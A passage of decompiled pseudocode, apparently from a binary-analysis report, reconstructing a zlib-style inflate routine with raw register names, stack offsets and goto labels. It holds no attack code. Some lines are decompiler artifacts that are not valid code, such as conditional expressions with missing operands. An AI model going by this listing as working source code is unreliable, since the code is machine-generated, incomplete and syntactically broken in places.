                                                                                                          											 *(__ebp - 0x10) = 0;
                                                                                                          											 *__ebx = 0xe;
                                                                                                          											if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                          												goto L323;
                                                                                                          											}
                                                                                                          											goto L172;
                                                                                                          										}
                                                                                                          										L170:
                                                                                                          										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                          										goto L17;
                                                                                                          									}
                                                                                                          									L166:
                                                                                                          									__eax =  *(__ebp - 8);
                                                                                                          									while(1) {
                                                                                                          										L167:
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L323;
                                                                                                          										}
                                                                                                          										L168:
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										 *(__ebp - 0x10) = __edi;
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										__eax =  *(__ebp - 8) + 1;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 8) = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L169;
                                                                                                          									}
                                                                                                          									goto L323;
                                                                                                          								case 0xe:
                                                                                                          									L172:
                                                                                                          									 *__ebx = 0xf;
                                                                                                          									goto L173;
                                                                                                          								case 0xf:
                                                                                                          									L173:
                                                                                                          									__eax = __ebx[0x10];
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eax == 0) {
                                                                                                          										L176:
                                                                                                          										 *__ebx = 0xb;
                                                                                                          										goto L135;
                                                                                                          									}
                                                                                                          									L174:
                                                                                                          									__eflags = __eax - __ecx;
                                                                                                          									__eax =  >  ? __ecx : __eax;
                                                                                                          									__eflags = __eax -  *(__ebp - 0x18);
                                                                                                          									__eax =  >  ?  *(__ebp - 0x18) : __eax;
                                                                                                          									 *(__ebp - 0x34) = __eax;
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eax == 0) {
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L175:
                                                                                                          									__eax = memcpy( *(__ebp - 0x1c),  *(__ebp - 8), __eax);
                                                                                                          									__eax =  *(__ebp - 0x34);
                                                                                                          									__esp = __esp + 0xc;
                                                                                                          									__ecx =  *(__ebp - 4);
                                                                                                          									 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                          									__ecx =  *(__ebp - 4) - __eax;
                                                                                                          									 *(__ebp - 0x18) =  *(__ebp - 0x18) - __eax;
                                                                                                          									 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + __eax;
                                                                                                          									__ebx[0x10] = __ebx[0x10] - __eax;
                                                                                                          									__edx =  *(__ebp - 0xc);
                                                                                                          									 *(__ebp - 4) = __ecx;
                                                                                                          									goto L135;
                                                                                                          								case 0x10:
                                                                                                          									goto L0;
                                                                                                          								case 0x11:
                                                                                                          									while(1) {
                                                                                                          										L189:
                                                                                                          										__eflags = _t920[0x1a] - _t920[0x17];
                                                                                                          										if(_t920[0x1a] >= _t920[0x17]) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L184:
                                                                                                          										__eflags = _t1103 - 3;
                                                                                                          										if(_t1103 >= 3) {
                                                                                                          											L188:
                                                                                                          											_t944 = _t1054 & 0x00000007;
                                                                                                          											_t1054 = _t1054 >> 3;
                                                                                                          											 *(_t1164 - 0xc) = _t1054;
                                                                                                          											 *(_t920 + 0x70 + ( *(0x884908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = _t944;
                                                                                                          											_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                          											_t1103 = _t1103 - 3;
                                                                                                          											__eflags = _t1103;
                                                                                                          											_t928 =  *(_t1164 - 4);
                                                                                                          											 *(_t1164 - 0x10) = _t1103;
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										L185:
                                                                                                          										_t804 =  *(_t1164 - 8);
                                                                                                          										while(1) {
                                                                                                          											L186:
                                                                                                          											__eflags = _t928;
                                                                                                          											if(_t928 == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L187:
                                                                                                          											 *(_t1164 - 4) = _t928 - 1;
                                                                                                          											_t806 = ( *_t804 & 0x000000ff) << _t1103;
                                                                                                          											_t1103 = _t1103 + 8;
                                                                                                          											_t928 =  *(_t1164 - 4);
                                                                                                          											_t1054 = _t1054 + _t806;
                                                                                                          											_t804 =  &(( *(_t1164 - 8))[1]);
                                                                                                          											 *(_t1164 - 0xc) = _t1054;
                                                                                                          											 *(_t1164 - 8) = _t804;
                                                                                                          											__eflags = _t1103 - 3;
                                                                                                          											if(_t1103 < 3) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L188;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L190:
                                                                                                          									while(1) {
                                                                                                          										L192:
                                                                                                          										__eflags = _t920[0x1a] - 0x13;
                                                                                                          										if(_t920[0x1a] >= 0x13) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										L191:
                                                                                                          										 *(_t920 + 0x70 + ( *(0x884908 + _t920[0x1a] * 2) & 0x0000ffff) * 2) = 0;
                                                                                                          										_t368 =  &(_t920[0x1a]);
                                                                                                          										 *_t368 = _t920[0x1a] + 1;
                                                                                                          										__eflags =  *_t368;
                                                                                                          									}
                                                                                                          									L193:
                                                                                                          									_t810 =  &(_t920[0x14c]);
                                                                                                          									_t920[0x13] = _t810;
                                                                                                          									_t920[0x1b] = _t810;
                                                                                                          									_t920[0x15] = 7;
                                                                                                          									_t813 = E008833B4(0,  &(_t920[0x1c]), 0x13,  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                          									_t1166 = _t1166 + 0x18;
                                                                                                          									 *(_t1164 - 0x20) = _t813;
                                                                                                          									__eflags = _t813;
                                                                                                          									if(_t813 == 0) {
                                                                                                          										L196:
                                                                                                          										_t920[0x1a] = _t920[0x1a] & 0x00000000;
                                                                                                          										 *_t920 = 0x12;
                                                                                                          										goto L224;
                                                                                                          									}
                                                                                                          									L194:
                                                                                                          									_t1125[6] = "invalid code lengths set";
                                                                                                          									goto L195;
                                                                                                          								case 0x12:
                                                                                                          									while(1) {
                                                                                                          										L224:
                                                                                                          										_t949 = _t920[0x1a];
                                                                                                          										 *(_t1164 - 0x2c) = _t949;
                                                                                                          										__eflags = _t949 - _t920[0x19] + _t920[0x18];
                                                                                                          										if(_t949 < _t920[0x19] + _t920[0x18]) {
                                                                                                          											goto L199;
                                                                                                          										} else {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L199:
                                                                                                          											_t817 =  *((intOrPtr*)(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4));
                                                                                                          											 *(_t1164 - 0x34) = _t817;
                                                                                                          											__eflags = (_t817 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                          											if((_t817 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L197:
                                                                                                          											_t935 =  *(_t1164 - 4);
                                                                                                          											__eflags = _t935;
                                                                                                          											if(_t935 == 0) {
                                                                                                          												goto L323;
                                                                                                          											}
                                                                                                          											L198:
                                                                                                          											_t1072 =  *(_t1164 - 8);
                                                                                                          											 *(_t1164 - 4) = _t935 - 1;
                                                                                                          											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1072 & 0x000000ff) << _t1103);
                                                                                                          											 *(_t1164 - 8) =  &(_t1072[1]);
                                                                                                          											_t1103 = _t1103 + 8;
                                                                                                          											__eflags = _t1103;
                                                                                                          										}
                                                                                                          										L200:
                                                                                                          										_push(0x10);
                                                                                                          										_t1075 = _t817 >> 0x10;
                                                                                                          										_pop(_t956);
                                                                                                          										__eflags = _t1075 - _t956;
                                                                                                          										if(__eflags >= 0) {
                                                                                                          											L202:
                                                                                                          											if(__eflags != 0) {
                                                                                                          												L208:
                                                                                                          												_t1076 =  *(_t1164 - 0xc);
                                                                                                          												_push(0x11);
                                                                                                          												_pop(_t957);
                                                                                                          												__eflags =  *(_t1164 - 0x32) - _t957;
                                                                                                          												_t958 = _t817 & 0x000000ff;
                                                                                                          												if( *(_t1164 - 0x32) != _t957) {
                                                                                                          													L214:
                                                                                                          													 *(_t1164 - 0x10) = _t958;
                                                                                                          													while(1) {
                                                                                                          														L215:
                                                                                                          														_t432 = _t958 + 7; // 0x18
                                                                                                          														__eflags = _t1103 - _t432;
                                                                                                          														if(_t1103 >= _t432) {
                                                                                                          															break;
                                                                                                          														}
                                                                                                          														L216:
                                                                                                          														_t935 =  *(_t1164 - 4);
                                                                                                          														__eflags = _t935;
                                                                                                          														if(_t935 == 0) {
                                                                                                          															goto L323;
                                                                                                          														}
                                                                                                          														L217:
                                                                                                          														 *(_t1164 - 4) = _t935 - 1;
                                                                                                          														_t958 =  *(_t1164 - 0x10);
                                                                                                          														_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                          														 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                          														_t1103 = _t1103 + 8;
                                                                                                          														 *(_t1164 - 0xc) = _t1076;
                                                                                                          													}
                                                                                                          													L218:
                                                                                                          													_t1077 = _t1076 >> _t958;
                                                                                                          													_t1078 = _t1077 >> 7;
                                                                                                          													_push(0xfffffff9);
                                                                                                          													_pop(_t821);
                                                                                                          													_t961 = (_t1077 & 0x0000007f) + 0xb;
                                                                                                          													_t822 = _t821 -  *(_t1164 - 0x10);
                                                                                                          													__eflags = _t822;
                                                                                                          													L219:
                                                                                                          													 *(_t1164 - 0x34) =  *(_t1164 - 0x34) & 0x00000000;
                                                                                                          													_t1103 = _t1103 + _t822;
                                                                                                          													__eflags = _t1103;
                                                                                                          													L220:
                                                                                                          													 *(_t1164 - 0x30) = _t961;
                                                                                                          													 *(_t1164 - 0xc) = _t1078;
                                                                                                          													 *(_t1164 - 0x10) = _t1103;
                                                                                                          													__eflags = _t961 +  *(_t1164 - 0x2c) - _t920[0x19] + _t920[0x18];
                                                                                                          													if(_t961 +  *(_t1164 - 0x2c) > _t920[0x19] + _t920[0x18]) {
                                                                                                          														L227:
                                                                                                          														_t1125[6] = "invalid bit length repeat";
                                                                                                          														 *_t920 = 0x1d;
                                                                                                          														L228:
                                                                                                          														__eflags =  *_t920 - 0x1d;
                                                                                                          														if( *_t920 == 0x1d) {
                                                                                                          															L133:
                                                                                                          															_t1054 =  *(_t1164 - 0xc);
                                                                                                          															goto L134;
                                                                                                          														}
                                                                                                          														L229:
                                                                                                          														__eflags = _t920[0x9c];
                                                                                                          														if(_t920[0x9c] != 0) {
                                                                                                          															L231:
                                                                                                          															_t826 =  &(_t920[0x14c]);
                                                                                                          															_t920[0x13] = _t826;
                                                                                                          															_t920[0x1b] = _t826;
                                                                                                          															_t920[0x15] = 9;
                                                                                                          															_t829 = E008833B4(1,  &(_t920[0x1c]), _t920[0x18],  &(_t920[0x1b]),  &(_t920[0x15]),  &(_t920[0xbc]));
                                                                                                          															_t1166 = _t1166 + 0x18;
                                                                                                          															 *(_t1164 - 0x20) = _t829;
                                                                                                          															__eflags = _t829;
                                                                                                          															if(_t829 == 0) {
                                                                                                          																L233:
                                                                                                          																_t920[0x14] = _t920[0x1b];
                                                                                                          																_t920[0x16] = 6;
                                                                                                          																_t835 = E008833B4(2, _t920 + (_t920[0x18] + 0x38) * 2, _t920[0x19],  &(_t920[0x1b]),  &(_t920[0x16]),  &(_t920[0xbc]));
                                                                                                          																_t1166 = _t1166 + 0x18;
                                                                                                          																 *(_t1164 - 0x20) = _t835;
                                                                                                          																__eflags = _t835;
                                                                                                          																if(_t835 == 0) {
                                                                                                          																	L235:
                                                                                                          																	__eflags =  *((intOrPtr*)(_t1164 + 0xc)) - 6;
                                                                                                          																	_t935 =  *(_t1164 - 4);
                                                                                                          																	 *_t920 = 0x13;
                                                                                                          																	if( *((intOrPtr*)(_t1164 + 0xc)) == 6) {
                                                                                                          																		goto L323;
                                                                                                          																	}
                                                                                                          																	L236:
                                                                                                          																	_t1081 =  *(_t1164 - 0xc);
                                                                                                          																	goto L237;
                                                                                                          																}
                                                                                                          																L234:
                                                                                                          																_t1125[6] = "invalid distances set";
                                                                                                          																L195:
                                                                                                          																 *_t920 = 0x1d;
                                                                                                          																goto L133;
                                                                                                          															}
                                                                                                          															L232:
                                                                                                          															_t1125[6] = "invalid literal/lengths set";
                                                                                                          															goto L195;
                                                                                                          														}
                                                                                                          														L230:
                                                                                                          														_t1125[6] = "invalid code -- missing end-of-block";
                                                                                                          														goto L195;
                                                                                                          													}
                                                                                                          													L221:
                                                                                                          													_t1036 =  *(_t1164 - 0x30);
                                                                                                          													__eflags = _t1036;
                                                                                                          													if(_t1036 == 0) {
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													L222:
                                                                                                          													_t1098 =  *(_t1164 - 0x34);
                                                                                                          													do {
                                                                                                          														L223:
                                                                                                          														 *(_t920 + 0x70 + _t920[0x1a] * 2) = _t1098;
                                                                                                          														_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                          														_t1036 = _t1036 - 1;
                                                                                                          														__eflags = _t1036;
                                                                                                          													} while (_t1036 != 0);
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												L209:
                                                                                                          												 *(_t1164 - 0x10) = _t958;
                                                                                                          												while(1) {
                                                                                                          													L210:
                                                                                                          													_t422 = _t958 + 3; // 0x14
                                                                                                          													__eflags = _t1103 - _t422;
                                                                                                          													if(_t1103 >= _t422) {
                                                                                                          														break;
                                                                                                          													}
                                                                                                          													L211:
                                                                                                          													_t935 =  *(_t1164 - 4);
                                                                                                          													__eflags = _t935;
                                                                                                          													if(_t935 == 0) {
                                                                                                          														goto L323;
                                                                                                          													}
                                                                                                          													L212:
                                                                                                          													 *(_t1164 - 4) = _t935 - 1;
                                                                                                          													_t958 =  *(_t1164 - 0x10);
                                                                                                          													_t1076 = _t1076 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t1103);
                                                                                                          													 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                          													_t1103 = _t1103 + 8;
                                                                                                          													 *(_t1164 - 0xc) = _t1076;
                                                                                                          												}
                                                                                                          												L213:
                                                                                                          												_t1099 = _t1076 >> _t958;
                                                                                                          												_t1078 = _t1099 >> 3;
                                                                                                          												_push(0xfffffffd);
                                                                                                          												_pop(_t912);
                                                                                                          												_t961 = (_t1099 & 0x00000007) + 3;
                                                                                                          												_t822 = _t912 -  *(_t1164 - 0x10);
                                                                                                          												goto L219;
                                                                                                          											}
                                                                                                          											L203:
                                                                                                          											_t1046 = (_t817 >> 0x00000008 & 0x000000ff) + 2;
                                                                                                          											 *(_t1164 - 0x34) = _t1046;
                                                                                                          											__eflags = _t1103 - _t1046;
                                                                                                          											if(_t1103 >= _t1046) {
                                                                                                          												L206:
                                                                                                          												_t1047 = _t817 & 0x000000ff;
                                                                                                          												_t916 =  *(_t1164 - 0x2c);
                                                                                                          												_t1103 = _t1103 - _t1047;
                                                                                                          												_t1054 =  *(_t1164 - 0xc) >> _t1047;
                                                                                                          												 *(_t1164 - 0xc) = _t1054;
                                                                                                          												 *(_t1164 - 0x10) = _t1103;
                                                                                                          												__eflags = _t916;
                                                                                                          												if(_t916 == 0) {
                                                                                                          													L226:
                                                                                                          													_t1125[6] = "invalid bit length repeat";
                                                                                                          													goto L17;
                                                                                                          												}
                                                                                                          												L207:
                                                                                                          												_t1078 = _t1054 >> 2;
                                                                                                          												_t961 = (_t1054 & 0x00000003) + 3;
                                                                                                          												 *(_t1164 - 0x34) =  *(_t920 + 0x6e + _t916 * 2) & 0x0000ffff;
                                                                                                          												_t1103 = _t1103 - 2;
                                                                                                          												goto L220;
                                                                                                          											} else {
                                                                                                          												goto L204;
                                                                                                          											}
                                                                                                          											while(1) {
                                                                                                          												L204:
                                                                                                          												_t935 =  *(_t1164 - 4);
                                                                                                          												__eflags = _t935;
                                                                                                          												if(_t935 == 0) {
                                                                                                          													goto L323;
                                                                                                          												}
                                                                                                          												L205:
                                                                                                          												 *(_t1164 - 4) = _t935 - 1;
                                                                                                          												_t1102 = ( *( *(_t1164 - 8)) & 0x000000ff) << _t1103;
                                                                                                          												_t1103 = _t1103 + 8;
                                                                                                          												 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + _t1102;
                                                                                                          												 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                          												__eflags = _t1103 -  *(_t1164 - 0x34);
                                                                                                          												if(_t1103 <  *(_t1164 - 0x34)) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L206;
                                                                                                          											}
                                                                                                          											goto L323;
                                                                                                          										}
                                                                                                          										L201:
                                                                                                          										_t1053 = _t817 >> 0x00000008 & 0x000000ff;
                                                                                                          										_t1103 = _t1103 - _t1053;
                                                                                                          										 *(_t1164 - 0xc) =  *(_t1164 - 0xc) >> _t1053;
                                                                                                          										 *(_t1164 - 0x10) = _t1103;
                                                                                                          										 *(_t920 + 0x70 +  *(_t1164 - 0x2c) * 2) = _t1075;
                                                                                                          										_t920[0x1a] = _t920[0x1a] + 1;
                                                                                                          									}
                                                                                                          									L225:
                                                                                                          									goto L228;
                                                                                                          								case 0x13:
                                                                                                          									L237:
                                                                                                          									 *_t920 = 0x14;
                                                                                                          									goto L238;
                                                                                                          								case 0x14:
                                                                                                          									L238:
                                                                                                          									__eflags = _t935 - 6;
                                                                                                          									if(_t935 < 6) {
                                                                                                          										L242:
                                                                                                          										_t920[0x6f1] = _t920[0x6f1] & 0x00000000;
                                                                                                          										 *(_t1164 - 0x30) = _t920[0x13];
                                                                                                          										_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 & _t1081) * 4);
                                                                                                          										while(1) {
                                                                                                          											L245:
                                                                                                          											__eflags = (_t842 >> 0x00000008 & 0x000000ff) - _t1103;
                                                                                                          											if((_t842 >> 0x00000008 & 0x000000ff) <= _t1103) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L243:
                                                                                                          											_t935 =  *(_t1164 - 4);
                                                                                                          											__eflags = _t935;
                                                                                                          											if(_t935 == 0) {
                                                                                                          												goto L323;
                                                                                                          											}
                                                                                                          											L244:
                                                                                                          											 *(_t1164 - 4) = _t935 - 1;
                                                                                                          											_t971 = _t1103;
                                                                                                          											_t1103 = _t1103 + 8;
                                                                                                          											 *(_t1164 - 0x10) = _t1103;
                                                                                                          											 *(_t1164 - 8) =  &(( *(_t1164 - 8))[1]);
                                                                                                          											 *(_t1164 - 0xc) = _t1081 + (( *( *(_t1164 - 8)) & 0x000000ff) << _t971);
                                                                                                          											__eflags = 1;
                                                                                                          											_t842 =  *(_t920[0x13] + ((1 << _t920[0x15]) - 0x00000001 &  *(_t1164 - 0xc)) * 4);
                                                                                                          											_t1081 =  *(_t1164 - 0xc);
                                                                                                          										}
                                                                                                          										L246:
                                                                                                          										__eflags = _t842;
                                                                                                          										if(_t842 == 0) {
                                                                                                          											L252:
                                                                                                          											_t975 = _t842 >> 0x00000008 & 0x000000ff;
                                                                                                          											_t920[0x6f1] = _t920[0x6f1] + _t975;
                                                                                                          											_t1103 = _t1103 - _t975;
                                                                                                          											_t1054 = _t1081 >> _t975;
                                                                                                          											 *(_t1164 - 0xc) = _t1054;
                                                                                                          											 *(_t1164 - 0x10) = _t1103;
                                                                                                          											_t920[0x10] = _t842 >> 0x10;
                                                                                                          											__eflags = _t842;
                                                                                                          											if(_t842 != 0) {
                                                                                                          												L254:
                                                                                                          												__eflags = _t842 & 0x00000020;
                                                                                                          												if((_t842 & 0x00000020) == 0) {
                                                                                                          													L256:
                                                                                                          													_t928 =  *(_t1164 - 4);
                                                                                                          													__eflags = _t842 & 0x00000040;
                                                                                                          													if((_t842 & 0x00000040) == 0) {
                                                                                                          														L258:
                                                                                                          														_t848 = _t842 & 0xf;
                                                                                                          														__eflags = _t848;
                                                                                                          														 *_t920 = 0x15;
                                                                                                          														_t920[0x12] = _t848;
                                                                                                          														goto L259;
                                                                                                          													}
                                                                                                          													L257:
                                                                                                          													_t1125[6] = "invalid literal/length code";
                                                                                                          													goto L31;
                                                                                                          												}
                                                                                                          												L255:
                                                                                                          												_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                          												 *_t920 = 0xb;
                                                                                                          												goto L134;
                                                                                                          											}
                                                                                                          											L253:
                                                                                                          											 *_t920 = 0x19;
                                                                                                          											goto L134;
                                                                                                          										}
                                                                                                          										L247:
                                                                                                          										__eflags = _t842 & 0x000000f0;
                                                                                                          										if((_t842 & 0x000000f0) != 0) {
                                                                                                          											goto L252;
                                                                                                          										}
                                                                                                          										L248:
                                                                                                          										_t926 = _t842 >> 8;
                                                                                                          										_t1096 = _t842;
                                                                                                          										 *(_t1164 - 0x34) = _t1096;
                                                                                                          										_t842 =  *( *(_t1164 - 0x30) + ((((1 << (_t842 & 0x000000ff) + (_t926 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t926 & 0x000000ff)) + (_t842 >> 0x10)) * 4);
                                                                                                          										_t1103 =  *(_t1164 - 0x10);
                                                                                                          										_t920 =  *(_t1164 - 0x24);
                                                                                                          										__eflags = (_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) - _t1103;
                                                                                                          										if((_t842 >> 0x00000008 & 0x000000ff) + (_t926 & 0x000000ff) <= _t1103) {
                                                                                                          											L251:
                                                                                                          											_t1125 =  *(_t1164 + 8);
                                                                                                          											_t1025 = _t1096 & 0x000000ff;
                                                                                                          											_t1081 =  *(_t1164 - 0xc) >> _t1025;
                                                                                                          											_t1103 = _t1103 - _t1025;
                                                                                                          											__eflags = _t1103;
                                                                                                          											_t920[0x6f1] = _t1025;
                                                                                                          											goto L252;
                                                                                                          										} else {
                                                                                                          											goto L249;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L249:
                                                                                                          											_t1153 =  *(_t1164 - 4);
                                                                                                          											__eflags = _t1153;
                                                                                                          											if(_t1153 == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L250:
                                                                                                          											 *(_t1164 - 4) = _t1153 - 1;
                                                                                                          											_t1155 =  *(_t1164 - 8);
                                                                                                          											 *(_t1164 - 0x10) = _t1103 + 8;
                                                                                                          											_t1124 = _t1096 & 0x000000ff;
                                                                                                          											 *(_t1164 - 0xc) =  *(_t1164 - 0xc) + (( *_t1155 & 0x000000ff) << _t1103);
                                                                                                          											 *(_t1164 - 8) =  &(_t1155[1]);
                                                                                                          											_t842 =  *(_t920[0x13] + ((((1 << (_t1096 & 0x000000ff) + _t1124) - 0x00000001 &  *(_t1164 - 0xc)) >> _t1124) + ( *(_t1164 - 0x32) & 0x0000ffff)) * 4);
                                                                                                          											_t1103 =  *(_t1164 - 0x10);
                                                                                                          											__eflags = (_t842 >> 0x00000008 & 0x000000ff) + _t1124 - _t1103;
                                                                                                          											if((_t842 >> 0x00000008 & 0x000000ff) + _t1124 > _t1103) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L251;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									}
                                                                                                          									L239:
                                                                                                          									_t901 =  *(_t1164 - 0x18);
                                                                                                          									__eflags = _t901 - 0x102;
                                                                                                          									if(_t901 < 0x102) {
                                                                                                          										goto L242;
                                                                                                          									}
                                                                                                          									L240:
                                                                                                          									_push( *((intOrPtr*)(_t1164 - 0x28)));
                                                                                                          									_t1125[3] =  *(_t1164 - 0x1c);
                                                                                                          									_t920 =  *(_t1164 - 0x24);
                                                                                                          									_t1125[4] = _t901;
                                                                                                          									 *_t1125 =  *(_t1164 - 8);
                                                                                                          									_t1125[1] = _t935;
                                                                                                          									_push(_t1125);
                                                                                                          									_t920[0xe] = _t1081;
                                                                                                          									_t920[0xf] = _t1103;
                                                                                                          									E00883840();
                                                                                                          									__eflags =  *_t920 - 0xb;
                                                                                                          									_t1054 = _t920[0xe];
                                                                                                          									_t1103 = _t920[0xf];
                                                                                                          									 *(_t1164 - 0x1c) = _t1125[3];
                                                                                                          									_t928 = _t1125[1];
                                                                                                          									 *(_t1164 - 0x18) = _t1125[4];
                                                                                                          									 *(_t1164 - 8) =  *_t1125;
                                                                                                          									 *(_t1164 - 4) = _t928;
                                                                                                          									 *(_t1164 - 0xc) = _t1054;
                                                                                                          									 *(_t1164 - 0x10) = _t1103;
                                                                                                          									if( *_t920 == 0xb) {
                                                                                                          										_t920[0x6f1] = _t920[0x6f1] | 0xffffffff;
                                                                                                          									}
                                                                                                          									goto L135;
                                                                                                          								case 0x15:
                                                                                                          									L259:
                                                                                                          									_t1129 = _t920[0x12];
                                                                                                          									__eflags = _t1129;
                                                                                                          									if(_t1129 == 0) {
                                                                                                          										L265:
                                                                                                          										_t920[0x6f2] = _t920[0x10];
                                                                                                          										 *_t920 = 0x16;
                                                                                                          										goto L266;
                                                                                                          									}
                                                                                                          									L260:
                                                                                                          									__eflags = _t1103 - _t1129;
                                                                                                          									if(_t1103 >= _t1129) {
                                                                                                          										L264:
                                                                                                          										_t1015 = _t1129;
                                                                                                          										_t1103 = _t1103 - _t1129;
                                                                                                          										 *(_t1164 - 0x10) = _t1103;
                                                                                                          										_t891 = (1 << _t1015) - 0x00000001 & _t1054;
                                                                                                          										_t1054 = _t1054 >> _t1015;
                                                                                                          										_t920[0x10] = _t920[0x10] + _t891;
                                                                                                          										_t580 =  &(_t920[0x6f1]);
                                                                                                          										 *_t580 = _t920[0x6f1] + _t1129;
                                                                                                          										__eflags =  *_t580;
                                                                                                          										 *(_t1164 - 0xc) = _t1054;
                                                                                                          										goto L265;
                                                                                                          									}
                                                                                                          									L261:
                                                                                                          									_t892 =  *(_t1164 - 8);
                                                                                                          									while(1) {
                                                                                                          										L262:
                                                                                                          										__eflags = _t928;
                                                                                                          										if(_t928 == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L263:
                                                                                                          										 *(_t1164 - 4) = _t928 - 1;
                                                                                                          										_t894 = ( *_t892 & 0x000000ff) << _t1103;
                                                                                                          										_t1103 = _t1103 + 8;
                                                                                                          										_t928 =  *(_t1164 - 4);
                                                                                                          										_t1054 = _t1054 + _t894;
                                                                                                          										_t892 =  &(( *(_t1164 - 8))[1]);
                                                                                                          										 *(_t1164 - 0xc) = _t1054;
                                                                                                          										 *(_t1164 - 8) = _t892;
                                                                                                          										__eflags = _t1103 - _t1129;
                                                                                                          										if(_t1103 < _t1129) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L264;
                                                                                                          									}
                                                                                                          									goto L322;
                                                                                                          								case 0x16:
                                                                                                          									L266:
                                                                                                          									_t1130 = _t920[0x14];
                                                                                                          									 *(_t1164 - 0x30) = _t1130;
                                                                                                          									_t855 =  *(_t1130 + ((1 << _t920[0x16]) - 0x00000001 & _t1054) * 4);
                                                                                                          									__eflags = 0xad - _t1103;
                                                                                                          									if(0xad <= _t1103) {
                                                                                                          										L270:
                                                                                                          										__eflags = _t855 & 0x000000f0;
                                                                                                          										if((_t855 & 0x000000f0) != 0) {
                                                                                                          											L275:
                                                                                                          											_t1125 =  *(_t1164 + 8);
                                                                                                          											_t984 = _t855 >> 0x00000008 & 0x000000ff;
                                                                                                          											_t920[0x6f1] = _t920[0x6f1] + _t984;
                                                                                                          											_t1103 = _t1103 - _t984;
                                                                                                          											_t1054 = _t1054 >> _t984;
                                                                                                          											 *(_t1164 - 0xc) = _t1054;
                                                                                                          											 *(_t1164 - 0x10) = _t1103;
                                                                                                          											__eflags = _t855 & 0x00000040;
                                                                                                          											if((_t855 & 0x00000040) == 0) {
                                                                                                          												L277:
                                                                                                          												 *_t920 = 0x17;
                                                                                                          												_t857 = _t855 & 0xf;
                                                                                                          												__eflags = _t857;
                                                                                                          												_t920[0x11] = _t855 >> 0x10;
                                                                                                          												_t920[0x12] = _t857;
                                                                                                          												goto L278;
                                                                                                          											}
                                                                                                          											L276:
                                                                                                          											_t1125[6] = "invalid distance code";
                                                                                                          											goto L17;
                                                                                                          										}
                                                                                                          										L271:
                                                                                                          										_t924 = _t855 >> 8;
                                                                                                          										_t1088 = _t855;
                                                                                                          										 *(_t1164 - 0x34) = _t1088;
                                                                                                          										_t855 =  *( *(_t1164 - 0x30) + ((((1 << (_t855 & 0x000000ff) + (_t924 & 0x000000ff)) - 0x00000001 &  *(_t1164 - 0xc)) >> (_t924 & 0x000000ff)) + (_t855 >> 0x10)) * 4);
                                                                                                          										_t1103 =  *(_t1164 - 0x10);
                                                                                                          										_t920 =  *(_t1164 - 0x24);
                                                                                                          										__eflags = (_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) - _t1103;
                                                                                                          										if((_t855 >> 0x00000008 & 0x000000ff) + (_t924 & 0x000000ff) <= _t1103) {
                                                                                                          											L274:
                                                                                                          											_t1001 = _t1088 & 0x000000ff;
                                                                                                          											_t1103 = _t1103 - _t1001;
                                                                                                          											_t1054 =  *(_t1164 - 0xc) >> _t1001;
                                                                                                          											_t626 =  &(_t920[0x6f1]);
                                                                                                          											 *_t626 = _t920[0x6f1] + _t1001;
                                                                                                          											__eflags =  *_t626;
                                                                                                          											goto L275;
                                                                                                          										} else {
                                                                                                          											goto L272;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L272:
